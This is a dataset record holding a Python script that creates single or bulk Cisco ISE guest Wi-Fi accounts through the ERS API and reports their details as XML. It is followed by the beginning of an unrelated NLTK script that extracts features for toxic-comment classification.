\nretyu\nftgyhjuk\npurpose'''\n\nG_User_Type = 'Bulk'\nG_user_firstName = 'test_user'\nG_user_lastName = re.sub(r'^\"|\"$', '', r'''\"12'34'\"\"''')\nprint(\"G_user_lastName =======>\",G_user_lastName)\n\nG_User_Type = 'Bulk'\nG_Username_Prefix = 'AR_testing'\nG_Guest_User_Count = '3'\n\nG_Requester_Name = \"Nayana\"\n\"\"\"\n\n# \"\"\"\nG_CISCO_ISE_Domain = re.sub(r'^\"|\"$', '', r'''[*CISCO_ISE_Domain*]''')\nG_sponsor_username = re.sub(r'^\"|\"$', '', r'''[*SponsorUsername*]''')\nG_sponsor_Password = re.sub(r'^\"|\"$', '', r'''[*SponsorPassword*]''')\nG_guestType = re.sub(r'^\"|\"$', '', r'''[*GuestType*]''')\nG_portalId = re.sub(r'^\"|\"$', '', r'''[*ISE_PortalID*]''')\nG_Duration = re.sub(r'^\"|\"$', '', r'''[*Duration*]''')\nG_Location = re.sub(r'^\"|\"$', '',r'''[*Location*]''')\nG_Reason_For_Visit = re.sub(r'^\"|\"$', '', r'''[*ReasonForVisit*]''')\nG_User_Type = re.sub(r'^\"|\"$', '', r'''[*UserType*]''')\n\nG_user_firstName = re.sub(r'^\"|\"$', '', r'''[*UserFirstName*]''')\nG_user_lastName = re.sub(r'^\"|\"$', '', r'''[*UserLastName*]''')\n\nG_Username_Prefix = re.sub(r'^\"|\"$', '', r'''[*UsernamePrefix*]''')\nG_Guest_User_Count = re.sub(r'^\"|\"$', '', r'''[*GuestUserCount*]''')\nG_Requester_Name = re.sub(r'^\"|\"$', '', r'''[*RequesterName*]''')\n# \"\"\"\n\n\n\n# Module used for Logging\ndef LogMessage(ErrType, code, Message, RaisedExc='DEFAULT'):\n\n '''\n Function: LogMessage\n\n .SYNOPSIS:\n This module is used for printing erorr message on the screen\n\n .DESCRIPTION:\n This module will help in printing the verbose message or log error message on screen\n\n .DEPENDENCIES:\n module required: inspect\n\n .PARAMETER ALL:\n [string] ErrType: type of error key word(Error:Error, Exception:Exc, Information:INF)\n [string] code: Specific code for the error message\n [string] Message: Log Message\n [string] RaisedExc: exception type name\n\n .OUTPUTS:\n no return value\n\n .EXAMPLE 1:\n LogMessage('INF',\"[0-00-000-0000]\" ,\"Message to be logged\")\n\n .NOTES: None\n '''\n\n #getting calling module details\n caller = getframeinfo(stack()[1][0])\n Module_Name= caller.filename + \"/\" + stack()[1][3]\n linenumber = str(caller.lineno)\n\n if (ErrType == 'ERR'):\n exc_type, exc_obj, exc_tb = sys.exc_info()\n #fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]\n print(\"\\nERR : {0} [{1}|{2}] : {3}, {4},{5}\".format(code,Module_Name,linenumber,Message, str(RaisedExc), exc_type))\n\n elif (ErrType == 'INF'):\n print(\"\\nINF : {0} [{1}|{2}] : {3}\".format(code, Module_Name, linenumber, Message))\n\n else:\n print(\"\\nERR : {0} [{1}|{2}] : {3}\".format(code, Module_Name, linenumber, Message))\n\n\ndef Valid_Sponsor_Account(url, username, password):\n '''\n Function: Valid_Sponsor_Account\n\n .SYNOPSIS:\n This module is used to validate the if the provided Sponsor account details are valid or not\n\n .DESCRIPTION:\n This module is used to validate the if the provided Sponsor account details are valid or not\n\n .DEPENDENCIES:\n module required: Requests\n\n .PARAMETER ALL:\n [string] url: String XML data\n [string] username: Sponsor account name\n [string] password: Sponsor account password\n\n .OUTPUTS:\n No retun data\n\n .EXAMPLE 1:\n Url = 'a5163283212/11/2018 06:5312/12/2018 06:532 day(s)Demo purposea6786758412/11/2018 06:5312/12/2018 06:532 day(s)Demo purpose02SuccessSuccessfully fetched the user account Details'\n user_name = \"Guest\"\n password = \"test@123\"\n Valid_Sponsor_Account(Url, user_name, password)\n\n .NOTES: None\n '''\n\n try:\n url += 
'/ers/config/guestuser/versioninfo'\n LogMessage('INF', \"[0-00-000-0000]\",\"URL ======>\"+url)\n creds = str.encode(':'.join((username, password)))\n encodedAuth = bytes.decode(base64.b64encode(creds))\n\n headers = {\n 'accept': \"application/json\",\n 'content-type': \"application/json\",\n 'authorization': \" \".join((\"Basic\", encodedAuth)),\n 'cache-control': \"no-cache\"\n }\n\n response = requests.post(url, headers=headers)\n if (response.status_code == 401):\n LogMessage(\"ERR\", \"[0-01-003-0004]\", \"ISE API Returned 401 error, Invalid Sponsor Account or Domain Name please check the Inputs\")\n exit(1)\n\n except Exception as err:\n LogMessage(\"ERR\", \"[0-01-003-0004]\", \"Error Invoking the CISCO ISE Portal Check the Details. Error: \" + str(err))\n exit(1)\n\nclass Guest_user_details:\n\n def get_date(self, duration):\n '''\n Function: get_date\n\n .SYNOPSIS:\n This module is used to get the to and from timestamp based on the duration sent\n\n .DESCRIPTION:\n This module is used to get the to and from timestamp based on the duration sent. the to timestamp would be current\n UTC time and From will be the time duration of to_time + duration\n\n .DEPENDENCIES:\n None\n\n .PARAMETER ALL:\n [string] duration: duration for which the timestamps as to be fetched\n\n .OUTPUTS:\n [string] days: days count\n [string] to_date: to timestamp in string\n [string] from_date: from timestamp in string\n\n .EXAMPLE 1:\n duration = '2 days'\n days, to_date, from_date =get_date(duration)\n\n .NOTES: None\n '''\n\n from_timestamp = (datetime.now(timezone.utc))\n from_date = from_timestamp.strftime('%m/%d/%Y %H:%M')\n LogMessage('INF', \"[0-00-000-0000]\", \"from_date =====> \" + from_date)\n\n to_date = ''\n days = 0\n to_timestamp = ''\n try:\n # getting only the digit part of the duration variable\n delta_count = int(re.sub(\"\\D\", \"\", duration.replace(\" \", \"\")))\n LogMessage('INF', \"[0-00-000-0000]\", \"duration ===> \"+duration)\n LogMessage('INF', \"[0-00-000-0000]\", \"Delta count ====> \"+str(delta_count))\n\n # based on if it's month or days or hours get the delta time period\n\n if 'hour' in duration.lower():\n to_timestamp = (from_timestamp + timedelta(hours=delta_count))\n to_date = to_timestamp.strftime('%m/%d/%Y %H:%M')\n\n elif 'day' in duration.lower():\n to_timestamp = (from_timestamp + timedelta(days=delta_count))\n to_date = to_timestamp.strftime('%m/%d/%Y %H:%M')\n\n elif 'month' in duration.lower():\n to_timestamp = (from_timestamp + timedelta(days=(30*delta_count)))\n to_date = to_timestamp.strftime('%m/%d/%Y %H:%M')\n\n elif 'year' in duration.lower():\n to_timestamp = (from_timestamp + timedelta(days=(365 * delta_count)))\n to_date = to_timestamp.strftime('%m/%d/%Y %H:%M')\n\n days = (to_timestamp.date() - from_timestamp.date()).days\n days += 1\n\n # LogMessage('INF', \"[0-00-000-0000]\", \"to_date =======> \"+to_date)\n # LogMessage('INF', \"[0-00-000-0000]\", \"Valid days =====> \"+str(days))\n\n except Exception as err:\n LogMessage('ERR', \"[3-01-004-0001]\", \"Failed to fetch the Duration from the Request details\", str(err))\n exit(1)\n\n return days, from_date, to_date\n\n # API invocation for creating the guest user\n def Create_Guest_user(self, url, headers, body):\n '''\n Function: Create_Guest_user\n\n .SYNOPSIS:\n This module includes API invocation single Guest Account creation\n\n .DESCRIPTION:\n This module includes API invocation single Guest Account creation\n If the API invocation failed due to network issue the API will be invoke again after 
1,3,5 min time intervals\n\n .DEPENDENCIES:\n Required Module : Requests,base64\n\n .PARAMETER ALL:\n [string] url: CISCO ISE Domain Name\n [dict] headers: Request header\n [dict] body: Request payload\n\n .OUTPUTS:\n [string] Guest_user_ID: Created Guest user account ID\n\n .EXAMPLE 1:\n Domain_name= '*.harman.com:9060'\n reds = str.encode(':'.join((G_sponsor_username, G_sponsor_Password)))\n encodedAuth = bytes.decode(base64.b64encode(creds))\n headers = {\n 'accept': \"application/json\",\n 'content-type': \"application/json\",\n 'authorization': \" \".join((\"Basic\", encodedAuth)),\n 'cache-control': \"no-cache\"\n }\n\n payload = {\n \"GuestUser\" : {\"guestType\": \"Contractor (default)\",\n \"portalId\": \"40963c00-2e02-11e8-ba71-005056872c7f\",\n \"guestInfo\" : {\"firstName\": \"Sujeet_test\",\"lastName\": 1234,\"enabled\": true},\n \"guestAccessInfo\" : {\"validDays\": \"1\", \"fromDate\": \"12/07/2018 08:09\",\n \"toDate\": \"12/07/2018 15:00\", \"location\": \"Harman\"}}\n }\n ID =Create_Guest_user(Domain_name, headers,payload)\n\n .NOTES: None\n '''\n\n url += '/ers/config/guestuser'\n LogMessage('INF', \"[0-00-000-0000]\", \"Create Guest User API ====>\"+url)\n\n Guest_user_ID=''\n time_interval = [0, 60, 120, 180]\n tries = 4\n for retry_time in time_interval:\n try:\n time.sleep(retry_time)\n response = requests.post(url, data=json.dumps(body), headers=headers)\n response.raise_for_status()\n\n LogMessage('INF', \"[0-00-000-0000]\", \"Webservice response =====> \" + str(response))\n\n if (response.status_code == 201):\n print(\"API Header =====>\",response.headers)\n Guest_user_ID = response.headers['Location'].rsplit('/', 1)[1]\n\n else:\n LogMessage('ERR', \"[0-00-000-0000]\", \"Couldn't create the Guest user account. API returned a status code ==>{0} \".format(str(response.status_code)) )\n\n except (requests.exceptions.ConnectionError, requests.exceptions.Timeout) as err:\n LogMessage('ERR', \"[3-01-004-0001]\", \"API Error Encountered. couldn't Create the Guest user Account. Retrying. . . . .\", str(err))\n tries -= 1\n if tries != 0: # until tries count is zero\n continue\n else:\n LogMessage('ERR', \"[3-01-004-0001]\", \"Failed to create the Guest user Account.\", str(err))\n #sys.exit(1)\n\n except Exception as e:\n # catastrophic error. 
bail.\n error_message = response.json()['ERSResponse']['messages'][0]['title']\n LogMessage('ERR', \"[3-01-004-0001]\", \"API gave an exception ======>{0} \\nerror message: {1}\".format(e, error_message))\n #sys.exit(1)\n break\n return Guest_user_ID\n\n def Create_Bulk_Users(self, url, headers, body):\n '''\n Function: Create_Bulk_Users\n\n .SYNOPSIS:\n This module includes API invocation bulk Guest Account creation\n\n .DESCRIPTION:\n This module includes API invocation bulk Guest Account creation\n If the API invocation failed due to network issue the API will be invoke again after 1,3,5 min time intervals\n\n .DEPENDENCIES:\n Required Module : Requests,base64\n\n .PARAMETER ALL:\n [string] url: CISCO ISE Domain Name\n [dict] headers: Request header\n [dict] body: Request payload\n\n .OUTPUTS:\n [string] Bulk_ID: ID of the bulk request\n\n .EXAMPLE 1:\n Domain_name= '*.harman.com:9060'\n reds = str.encode(':'.join((G_sponsor_username, G_sponsor_Password)))\n encodedAuth = bytes.decode(base64.b64encode(creds))\n headers = {\n 'accept': \"application/xml\",\n 'content-type': \"application/xml\",\n 'authorization': \" \".join((\"Basic\", encodedAuth)),\n 'cache-control': \"no-cache\"\n }\n\n payload = '12/11/2018 21:00Harman12/11/2018 23:001trueAR_testing6192Contractor (default)40963c00-2e02-11e8-ba71-005056872c7f'\n bulk_ID = Create_Bulk_Users(Domain_name, headers,payload)\n\n .NOTES: None\n '''\n url += '/ers/config/guestuser/bulk/submit'\n LogMessage('INF', \"[0-00-000-0000]\", \"Create Bulk Guest User API ====>\" + url)\n LogMessage('INF', \"[0-00-000-0000]\", \"Create Bulk Guest User Request Payload====>\" + str(body))\n\n bulk_ID = ''\n time_interval = [0, 60, 120, 180]\n tries = 4\n for retry_time in time_interval:\n try:\n time.sleep(retry_time)\n response = requests.put(url, data=body, headers=headers)\n response.raise_for_status()\n\n LogMessage('INF', \"[0-00-000-0000]\", \"Webservice response =====> \" + str(response))\n\n if (response.status_code == 202):\n print(\"header ======> \",response.headers)\n bulk_ID = response.headers['Location'].rsplit('/', 1)[1]\n LogMessage('INF', \"[0-00-000-0000]\",\"Bulk ID ======>\"+bulk_ID)\n\n else:\n LogMessage('ERR', \"[0-00-000-0000]\",\n \"Couldn't create Bulk Guest user request. API returned a status code ==>{0} \".format(\n str(response.status_code)))\n\n except (requests.exceptions.ConnectionError, requests.exceptions.Timeout) as err:\n LogMessage('ERR', \"[3-01-004-0001]\",\n \"API Error Encountered. couldn't Create bulk Guest user request. Retrying. . . . .\", str(err))\n tries -= 1\n if tries != 0: # until tries count is zero\n continue\n else:\n LogMessage('ERR', \"[3-01-004-0001]\", \"Failed to create bulk guest user request.\", str(err))\n # sys.exit(1)\n\n except requests.HTTPError as e:\n error_message = response.json()['ERSResponse']['messages'][0]['title']\n LogMessage('ERR', \"[3-01-004-0001]\",\n \"API gave an exception ======>{0} \\nerror message: {1}\".format(e, error_message))\n\n except Exception as e:\n LogMessage('ERR', \"[3-01-004-0001]\",\"API gave an exception. 
Error: {0}\".format(e))\n # sys.exit(1)\n break\n return bulk_ID\n\n def Get_Bulk_Request_Details(self, url, headers, bulk_id):\n '''\n Function: Get_Bulk_Request_Details\n\n .SYNOPSIS:\n This module includes API invocation bulk Guest Account creation\n\n .DESCRIPTION:\n This module includes API invocation bulk Guest Account creation\n If the API invocation failed due to network issue the API will be invoke again after 1,3,5 min time intervals\n\n .DEPENDENCIES:\n Required Module : Requests,base64\n\n .PARAMETER ALL:\n [string] url: CISCO ISE Domain Name\n [dict] headers: Request header\n [string] bulk_id: Bulk_request ID for which the user Details has to be fetched\n\n .OUTPUTS:\n [list] bulk_request_details : Details of the specified bulk request ID\n\n .EXAMPLE 1:\n Domain_name= '*.harman.com:9060'\n reds = str.encode(':'.join((G_sponsor_username, G_sponsor_Password)))\n encodedAuth = bytes.decode(base64.b64encode(creds))\n headers = {\n 'accept': \"application/xml\",\n 'content-type': \"application/xml\",\n 'authorization': \" \".join((\"Basic\", encodedAuth)),\n 'cache-control': \"no-cache\"\n }\n\n bulk_id = '12783920023283'\n bulk_ID = Create_Bulk_Users(Domain_name, headers, bulk_id)\n\n .NOTES: None\n '''\n\n url += '/ers/config/guestuser/bulk/'+ bulk_id\n LogMessage('INF', \"[0-00-000-0000]\", \"Get Bulk request Details API ====>\" + url)\n\n bulk_request_details = {'success_count': 0,\n 'failure_count': 0,\n 'account_IDs': []}\n IDs = []\n time_interval = [0, 60, 120, 180]\n tries = 4\n for retry_time in time_interval:\n try:\n time.sleep(retry_time)\n response = requests.get(url, headers=headers)\n response.raise_for_status()\n\n LogMessage('INF', \"[0-00-000-0000]\", \"Webservice response =====> \" + str(response))\n\n if response.status_code == 200:\n response_data = response.json()\n bulk_request_details['success_count'] = response_data['BulkStatus']['successCount']\n bulk_request_details['failure_count'] = response_data['BulkStatus']['failCount']\n\n count = 0\n for each_user in response_data['BulkStatus']['resourcesStatus']:\n count += 1\n if (each_user['status'] == 'SUCCESS'):\n IDs.append(each_user['id'])\n elif (each_user['status'] == 'PENDING'):\n IDs.append(each_user['id'])\n else:\n LogMessage('ERR', \"[0-00-000-0000]\",\n \"Couldn't get bulk user - {0} details. Error message ==>{1} \".format(count, each_user['rootCause']))\n\n else:\n LogMessage('ERR', \"[0-00-000-0000]\",\n \"Couldn't get bulk user details. API returned a status code ==>{0} \".format(\n str(response.status_code)))\n\n except (requests.exceptions.ConnectionError, requests.exceptions.Timeout) as err:\n LogMessage('ERR', \"[3-01-004-0001]\",\n \"API Error Encountered. couldn't get bulk user details. Retrying. . . . 
.\", str(err))\n tries -= 1\n if tries != 0: # until tries count is zero\n continue\n else:\n LogMessage('ERR', \"[3-01-004-0001]\", \"Failed to get bulk user details.\", str(err))\n # sys.exit(1)\n\n except Exception as e:\n # error_message = response.json()['ERSResponse']['messages'][0]['title']\n error_message = 'webservice gave an error'\n LogMessage('ERR', \"[3-01-004-0001]\",\n \"API gave an exception ======>{0} \\nerror message: {1}\".format(e, error_message))\n # sys.exit(1)\n break\n\n bulk_request_details['account_IDs'] = IDs\n LogMessage(\"INF\", \"[0-00-000-0000]\", \"bulk_request_details =======>\"+str(bulk_request_details))\n return bulk_request_details\n\n def Get_User_Details(self, url, headers, UserID, reason, userType, duration, RequesterName):\n\n '''\n Function: Get_User_Details\n\n .SYNOPSIS:\n This module includes API invocation to get the User details of the specified User ID\n\n .DESCRIPTION:\n This module includes API invocation to get the User details of the specified User ID\n If the API invocation failed due to network issue the API will be invoke again after 1,3,5 min time intervals\n\n .DEPENDENCIES:\n Required Module : Requests,base64\n\n .PARAMETER ALL:\n [string] url: CISCO ISE Domain Name\n [dict] headers: Request header\n [String] UserID: User ID for which the Details has to be fetched\n\n specific to Requirement:\n [dict] reason: Reason for visit\n [String] userType: user type single or bulk\n [String] RequesterName: user type single or bulk\n\n .OUTPUTS:\n [dict] user_details : User Details of the specified User ID\n\n .EXAMPLE 1:\n Domain_name= '*.harman.com:9060'\n reds = str.encode(':'.join((G_sponsor_username, G_sponsor_Password)))\n encodedAuth = bytes.decode(base64.b64encode(creds))\n headers = {\n 'accept': \"application/xml\",\n 'content-type': \"application/xml\",\n 'authorization': \" \".join((\"Basic\", encodedAuth)),\n 'cache-control': \"no-cache\"\n }\n\n UserID = '12783920023283'\n userType = 'single'\n User_details = Create_Bulk_Users( Domain_name, headers, UserID, reason, userType, duration, RequesterName)\n\n .NOTES: None\n '''\n\n url += ('/ers/config/guestuser/' + UserID)\n\n user_details={}\n time_interval = [0, 60, 120, 180]\n tries = 4\n for retry_time in time_interval:\n try:\n time.sleep(retry_time)\n response = requests.get(url, headers=headers)\n response.raise_for_status()\n\n LogMessage('INF', \"[0-00-000-0000]\", \"Webservice response =====> \" + str(response))\n\n if response.status_code == 200:\n response_json = response.json()\n\n user_details['Username'] = response_json['GuestUser']['guestInfo']['userName']\n user_details['Password'] = response_json['GuestUser']['guestInfo']['password']\n user_details['ValidFrom'] = response_json['GuestUser']['guestAccessInfo']['fromDate']\n user_details['ValidTo'] = response_json['GuestUser']['guestAccessInfo']['toDate']\n user_details['Duration'] = duration\n user_details['ReasonForvisit'] = reason\n user_details['PersonBeingVisited'] = RequesterName\n if userType.lower() == 'single':\n\n user_details['FirstName'] = response_json['GuestUser']['guestInfo']['firstName']\n user_details['LastName'] = response_json['GuestUser']['guestInfo']['lastName']\n\n else:\n LogMessage('ERR', \"[0-00-000-0000]\",\n \"Couldn't create the Guest user account. API returned a status code ==>{0} \\n Retrying. . . . . 
\".format(\n str(response.status_code)))\n\n except (requests.exceptions.ConnectionError, requests.exceptions.Timeout) as err:\n LogMessage('ERR', \"[3-01-004-0001]\",\n \"API Error Encountered. couldn't Create the Guest user Account. Retrying. . . . .\", str(err))\n tries -= 1\n if tries != 0: # until tries count is zero\n continue\n else:\n LogMessage('ERR', \"[3-01-004-0001]\", \"Failed to create the Guest user Account.\", str(err))\n\n except Exception as e:\n # catastrophic error. bail.\n error_message = response.json()['ERSResponse']['messages'][0]['title']\n LogMessage('ERR', \"[3-01-004-0001]\",\n \"API gave an exception ======>{0} \\nerror message: {1}\".format(e, error_message))\n break\n\n #print(\"user_details ====>\",user_details)\n return user_details\n\n\nif __name__ == \"__main__\":\n\n Valid_Sponsor_Account(G_CISCO_ISE_Domain, G_sponsor_username, G_sponsor_Password)\n User = Guest_user_details()\n\n # getting to and from Dates\n valid_days, from_date, to_date = User.get_date(G_Duration)\n\n user_count = 0\n user_success_count = 0\n user_failure_count = 0\n User_ID_List = []\n\n # header remains the same for single user and multiple user same\n creds = str.encode(':'.join((G_sponsor_username, G_sponsor_Password)))\n encodedAuth = bytes.decode(base64.b64encode(creds))\n\n headers = {\n 'accept': \"application/json\",\n 'content-type': \"application/json\",\n 'authorization': \" \".join((\"Basic\", encodedAuth)),\n 'cache-control': \"no-cache\"\n }\n\n\n # based on if the user type is bulk or single invoking the required API\n if G_User_Type.lower() == 'single':\n\n # creating the guest users and getting the response\n payload = {\n \"GuestUser\": {\n \"guestType\": \"\",\n \"portalId\": \"\",\n \"guestInfo\": {\n \"firstName\": \"\",\n \"lastName\": \"\",\n \"enabled\": True\n },\n \"guestAccessInfo\": {\n \"validDays\": \"\",\n \"fromDate\": \"\",\n \"toDate\": \"\",\n \"location\": \"\"\n }\n }\n }\n\n # Updating the payload\n payload['GuestUser']['guestType'] = G_guestType\n payload['GuestUser']['portalId'] = G_portalId\n payload['GuestUser']['guestAccessInfo']['location'] = G_Location\n\n payload['GuestUser']['guestAccessInfo']['validDays'] = valid_days\n payload['GuestUser']['guestAccessInfo']['fromDate'] = from_date\n payload['GuestUser']['guestAccessInfo']['toDate'] = to_date\n\n user_count = 1\n # hit the web-service to create the user and get the user ID\n\n # Guest_account_ID = ''\n payload['GuestUser']['guestInfo']['firstName'] = G_user_firstName\n payload['GuestUser']['guestInfo']['lastName'] = G_user_lastName\n\n print(\"Single user request Playload ===> \",payload)\n Guest_account_ID = User.Create_Guest_user(G_CISCO_ISE_Domain, headers, payload)\n if (len(Guest_account_ID)) > 0:\n User_ID_List.append(Guest_account_ID)\n user_success_count = 1\n\n else:\n user_failure_count = 1\n\n elif G_User_Type.lower() == 'bulk':\n\n # updating the request header JSON for the Request\n headers['accept'] = \"application/json\"\n headers['content-type'] = \"application/xml\"\n\n if int(G_Guest_User_Count) < 1:\n print(\"\\nFailureFail to Create bulk request, User count is less than one\")\n exit(0)\n\n # forming the required XML for the Bulk User request\n payload = ''\n for user in range(0, int(G_Guest_User_Count)):\n user_payload = ''\n user_payload += '' + from_date + ''\n user_payload += '' + G_Location + ''\n user_payload += '' + to_date + ''\n user_payload += '' + str(valid_days) + ''\n user_payload += 'true'\n user_payload += '' + G_Username_Prefix + ''\n user_payload 
+= '' + str(random.randint(1000, 9999)) + ''\n user_payload += '' + G_guestType + ''\n user_payload += '' + G_portalId + ''\n payload += user_payload\n payload += ''\n\n # Invoking the module with the Header and Request Payload(xml) to create the BULK request\n Bulk_ID = User.Create_Bulk_Users(G_CISCO_ISE_Domain, headers, payload)\n # Bulk_ID = '1544694498913'\n LogMessage(\"INF\", \"[0-00-000-0000]\", \"Bulk ID ======>\"+Bulk_ID)\n\n # if create Bulk request fails then print the Error XML\n if len(Bulk_ID) == 0:\n print(\"\\nFailureFail to Create bulk request\")\n exit(0)\n\n # invoking the method to get the User ID for each of the success Accounts in the bulk request\n headers['accept'] = \"application/json\"\n headers['content-type'] = \"application/json\"\n bulk_request_details = User.Get_Bulk_Request_Details(G_CISCO_ISE_Domain, headers, Bulk_ID)\n\n user_count = int(G_Guest_User_Count)\n user_success_count = bulk_request_details['success_count']\n user_failure_count = bulk_request_details['failure_count']\n User_ID_List = bulk_request_details['account_IDs']\n\n # Check if the User Success count is greater than Zero, if yes get the details of each ID and for the Xml\n if user_success_count == 0:\n print(\"\\nFailureFail to Create the Guest User Account(s)\")\n exit(1)\n\n else:\n # getting the user account details for each User IDs\n user_details = []\n\n PrivateLog_UserDetails = ''\n for user_id in User_ID_List:\n details = User.Get_User_Details(G_CISCO_ISE_Domain, headers, user_id, G_Reason_For_Visit, G_User_Type,G_Duration,G_Requester_Name)\n if len(details) > 0:\n user_details.append(details)\n PrivateLog_UserDetails += '
User details:
'\n for key in details:\n PrivateLog_UserDetails += str(key) + ' : ' + str(details[key]) + '
'\n user_success_count += 1\n else:\n user_failure_count += 1\n\n ScriptOutput = {'Data': {},\n 'Status': '',\n 'PrivateLog': ''\n }\n if user_count == user_failure_count:\n ScriptOutput['Data']['UserDetails'] = []\n ScriptOutput['Data']['FailCount'] = user_failure_count\n ScriptOutput['Data']['SuccessCount'] = (user_count-user_failure_count)\n ScriptOutput['Status'] = 'Failure'\n ScriptOutput['PrivateLog'] = 'Failed to Get the user accounts Details'\n else:\n ScriptOutput['Data']['UserDetails'] = user_details\n ScriptOutput['Data']['FailCount'] = user_failure_count\n ScriptOutput['Data']['SuccessCount'] = (user_count - user_failure_count)\n ScriptOutput['Status'] = 'Success'\n ScriptOutput['PrivateLog'] = 'Successfully fetched the user account Details'+ PrivateLog_UserDetails\n\n xml = dicttoxml(ScriptOutput, custom_root=\"ScriptOutput\", attr_type=False)\n xml_str = (xml.decode(\"utf-8\"))\n xml_str = re.sub('', '', xml_str)\n xml_str = re.sub('', '', xml_str)\n print(\"\\n\", xml_str)\n\n","sub_path":"STG/Guest_WIFI_Create_Account.py","file_name":"Guest_WIFI_Create_Account.py","file_ext":"py","file_size_in_byte":33187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"185942812","text":"import nltk\nimport random\nimport csv\nimport re\nimport string\nimport os\nimport sys\nfrom urllib import request\nfrom nltk import FreqDist\nfrom nltk.corpus import stopwords \nfrom nltk.stem import PorterStemmer \nfrom nltk.tokenize import word_tokenize\nfrom nltk.util import bigrams\n\n#collect bad words\nbad_words = {}\n\nfor file in os.listdir(\"./bad_word/csv_file/\"):\n\twith open(\"./bad_word/csv_file/\" + file, errors = 'ignore') as f:\n\t\tdata = csv.reader(f, delimiter = \";\")\n\t\ttemp_data = set()\n\t\tfor row in data:\n\t\t\tif(len(row) > 0):\n\t\t\t\ttemp_data.add(row[0])\n\t\tbad_words[\"./bad_word/csv_file/\" + file] = temp_data\nfor file in os.listdir(\"./bad_word/txt_file/\"):\n\twith open(\"./bad_word/txt_file/\" + file, errors = 'ignore') as f:\n\t\ttemp_data = set()\n\t\tfor row in f:\n\t\t\tif(len(row.strip()) > 0):\n\t\t\t\ttemp_data.add(row.strip())\n\t\tbad_words[\"./bad_word/txt_file/\" + file] = temp_data\nfor file in os.listdir(\"./bad_word/comma_seperated_txt_file/\"):\n\twith open(\"./bad_word/comma_seperated_txt_file/\" + file, errors = 'ignore') as f:\n\t\ttemp_data = set()\n\t\tfor row in f:\n\t\t\tif not (len(row.strip()) == 0 or row.strip().startswith(\"##\")):\n\t\t\t\tfor word in row.strip().split(', '):\n\t\t\t\t\ttemp_data.add(word)\n\t\tbad_words[\"./bad_word/comma_seperated_txt_file/\" + file] = temp_data\n\nps = PorterStemmer() #stemmer\nstopwords = set(stopwords.words('english')) #stopword\nenglishwords = set(nltk.corpus.words.words())\nlabels = [\"toxic\",\"severe_toxic\",\"obscene\",\"threat\",\"insult\",\"identity_hate\"]\n\n#collect train data\ntrain_data = []\nwith open(\"./toxic_comment/train.csv\") as f:\n\tdata = csv.reader(f)\n\tnext(data)\n\tfor row in data:\n\t\ttrain_data.append((row[1],{\"toxic\" : int(row[2]), \"severe_toxic\" : int(row[3]), \"obscene\" : int(row[4]), \"threat\" : int(row[5]), \"insult\": int(row[6]), \"identity_hate\" : int(row[7])}))\n\n#negative features. 
Input is a sentence (raw string)\ncount = 0\ndef negative_features(sent):\n\twords = word_tokenize(sent) #tokenize into list of words\n\t#clean the data\n\t#tag_words = nltk.pos_tag(words) #add tag into each word\n\t#add features\n\tdic = {}\n\tdic.update(num_word(sent))\n\tdic.update(num_unique_word(sent))\n\tdic.update(ration_unique(sent))\n\tdic.update(num_token_no_stop(words))\n\tdic.update(num_spelling_error(words))\n\tdic.update(num_allcap(words))\n\tdic.update(rate_allcap(sent,words))\n\tdic.update(length_cmt(sent))\n\tdic.update(num_cap_letter(sent))\n\tdic.update(rate_cap_letter(sent))\n\tdic.update(num_explan_mark(sent))\n\tdic.update(rate_explan_mark(sent))\n\tdic.update(num_quest_mark(sent))\n\tdic.update(rate_quest_mark(sent))\n\tdic.update(num_punc_mark(sent))\n\tdic.update(num_mark_sym(sent))\n\tdic.update(num_smile(words))\n\tdic.update(rate_lower(sent))\n\treturn dic\n#features\ndef num_word(raw):\n '''\n count the number of word (duplicated)\n a word is defined as a substring seperated by space\n input: raw : string\n out put: dict num word: number of word \n '''\n return ({'num_word': len(raw.split())})\ndef num_unique_word(raw):\n '''\n count number of unique word (not duplicated)\n input raw: string\n output: dict num_unique_word: number of unique word\n '''\n return ({'num_unique_word':len(set(raw.split()))})\ndef ration_unique(raw):\n '''\n compute ration of unique word\n a word is a substring seperated by space\n input raw : str\n output: dict ration_unique : ration of unique word\n '''\n rate = num_unique_word(raw)['num_unique_word']/num_word(raw)['num_word']\n return ({'ration unique': round(rate,3)})\ndef num_token_no_stop(tokened):\n '''\n return number of token without stop word (depend on token function, can conclude '.', ',')\n duplicated\n intput tokened list : list\n output dict num token no stop: number of tokens without stop word \n '''\n no_stop= [w for w in tokened if w.lower() not in stopwords]\n return ({'num_token_no_stop':len(no_stop)})\ndef num_spelling_error(tokened):\n '''\n return number of word not in English vocab\n can be counted differences, women, measures (hàm kém vl)\n can be counted ',','.', \n input tokened: list\n output: dict num spelling error :number of tokens not in English vocab\n '''\n spell_wrong= [w for w in tokened if w.lower() not in englishwords]\n return ({'num_spelling_error':len(spell_wrong)})\ndef num_allcap(tokened):\n '''\n return number of word written all captial (duplicated)\n input tokened: list\n output: dict num all cap: number of tokens written all capital\n '''\n cap= [w for w in tokened if w.isupper()]\n return ({'num_all_cap':len(cap)})\ndef rate_allcap(raw, tokened):\n '''\n return portion of word written all capital (duplicated)\n input: raw: str\n tokened: list\n output: dict rate all cap :rate of all capital word\n '''\n rate = num_allcap(tokened)['num_all_cap']/ num_word(raw)['num_word']\n return ({'rate_all_cap': round(rate, 3)})\ndef length_cmt(raw):\n '''\n return length of the cmt\n intput raw: str\n output: dict 'length cmt':length of the cmt\n '''\n return ({'length_cmt': len(raw)})\ndef num_cap_letter(raw):\n '''\n return number of capital letter\n input raw: str\n output: dict 'num cap letter':number of capital letter\n '''\n cap = [w for w in raw if w.isupper()]\n return({'num_cap_letter':len(cap)})\ndef rate_cap_letter(raw):\n '''\n return ratio of capital letter\n input raw: str\n outout: dict 'rate cap letter': ratio of capital letter\n '''\n rate = 
